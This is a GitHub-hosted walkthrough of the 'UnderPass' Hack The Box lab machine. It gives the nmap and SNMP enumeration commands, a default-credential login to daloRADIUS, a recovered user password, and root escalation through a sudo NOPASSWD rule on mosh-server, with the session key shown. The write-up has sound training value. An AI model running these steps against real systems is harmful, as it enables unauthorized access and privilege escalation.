-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathUnderPass.htb
More file actions
65 lines (44 loc) · 2.12 KB
/
UnderPass.htb
File metadata and controls
65 lines (44 loc) · 2.12 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
-- NMAP SCAN --
Command: nmap underpass.htb -v -p 80
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-31 23:35 CST
Initiating Ping Scan at 23:35
Scanning underpass.htb (10.10.11.48) [4 ports]
Completed Ping Scan at 23:35, 0.29s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 23:35
Scanning underpass.htb (10.10.11.48) [1 port]
Discovered open port 80/tcp on 10.10.11.48
Completed SYN Stealth Scan at 23:35, 0.29s elapsed (1 total ports)
Nmap scan report for underpass.htb (10.10.11.48)
Host is up (0.27s latency).
PORT STATE SERVICE
80/tcp open http
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.70 seconds
Raw packets sent: 5 (196B) | Rcvd: 2 (72B)
-- SNMPBULKWALK --
Command: snmpbulkwalk -c public -v2c underpass.htb
iso.3.6.1.2.1.1.1.0 = STRING: "Linux underpass 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (80301) 0:13:23.01
iso.3.6.1.2.1.1.4.0 = STRING: "steve@underpass.htb"
iso.3.6.1.2.1.1.5.0 = STRING: "UnDerPass.htb is the only daloradius server in the basin!"
-- INITIAL ACCESS --
URL: http://underpass.htb/daloradius/app/operators/login.php
Deafult credentials username: administrator password: radius
-- CREDENTIALS FOUND --
Users tab - Username: svcMosh Password: underwaterfriends Password MD5:
412DD4759978ACFCC81DEAB01B382403
-- User Flag Obtained by logging into ssh using the credentials that were retrieved. --
-- Privilege Escalation --
Command: sudo -l
Matching Defaults entries for svcMosh on localhost:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User svcMosh may run the following commands on localhost:
(ALL) NOPASSWD: /usr/bin/mosh-server
-- Always a Good idea to read the man page of any new command or service --
Command: sudo /usr/bin/mosh-server new -p 61113
Initiates a server on the port 61113 with root privileges and also generates a key.
MOSH_KEY=QzOh2gOWZ3672OIDhszC0A mosh-client 127.0.0.1 61113
-- Root Flag Obtained --